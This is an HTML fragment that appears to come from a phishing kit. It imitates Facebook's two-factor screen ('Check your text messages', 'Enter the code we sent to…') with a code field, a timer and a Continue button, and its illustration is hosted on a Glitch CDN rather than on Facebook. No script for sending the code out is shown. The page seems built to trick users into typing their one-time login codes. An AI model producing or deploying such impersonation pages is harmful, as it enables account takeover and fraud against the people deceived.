<div class="sc-ce9c5cf8-0 kVLiUK2" id="twoFASection">
    <div class="sc-ce9c5cf8-1 clDnUI">
        <div class="gradient"></div>
        <div class="container">
            <div class="header">
                <span class="ps-2" style="font-weight: 500; font-size: 14px;margin-bottom: 8px;"><span
                        id="nameofuser2fa"></span> • Facebook</span>
                <div class="title">
                    <h1 class="tityle">Check your text messages</h1>
                    <p class="subtitle">Enter the code we sent to <span id="telofuser"></span></p>
                </div>
            </div>
            <div class="illustration">
                <img src="https://cdn.glitch.global/cd4ce9c6-50a7-4d64-ab18-73f8d2f3d811/2faimg.jpg?v=1727698569824"
                    alt="Hands holding a phone">
            </div>
            <input type="text" placeholder="Code" id="2facode" pattern="\d{6,}" title="Please enter at least 6 digits." oninput="this.value = this.value.replace(/[^0-9]/g, '')">
            <div class="timer"></div>
            <button class="btn btn-primary" id="2fabutton">Continue</button>
        </div>
    </div>
</div>